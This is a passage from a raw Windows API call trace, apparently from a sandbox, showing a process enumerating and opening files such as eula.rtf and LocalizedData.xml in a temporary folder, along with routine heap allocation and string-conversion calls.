dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.761] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0061.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.762] AreFileApisANSI () returned 1 [0061.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.763] AreFileApisANSI () returned 1 [0061.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0061.763] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.764] GetFileType (hFile=0x41c) returned 0x1 [0061.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.764] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.764] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.764] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.764] CloseHandle (hObject=0x41c) returned 1 [0061.764] AreFileApisANSI () returned 1 [0061.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0061.765] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.765] GetFileType (hFile=0x41c) returned 0x1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.765] CloseHandle (hObject=0x41c) returned 1 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.766] AreFileApisANSI () returned 1 [0061.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0061.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0061.766] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf)) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.766] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0061.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0061.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.767] AreFileApisANSI () returned 1 [0061.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.767] AreFileApisANSI () returned 1 [0061.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0061.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0061.768] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.768] GetFileType (hFile=0x41c) returned 0x1 [0061.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.768] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.768] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.768] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.768] CloseHandle (hObject=0x41c) returned 1 [0061.769] AreFileApisANSI () returned 1 [0061.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0061.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0061.769] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.769] GetFileType (hFile=0x41c) returned 0x1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.769] CloseHandle (hObject=0x41c) returned 1 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.770] AreFileApisANSI () returned 1 [0061.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0061.770] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e)) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.770] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, 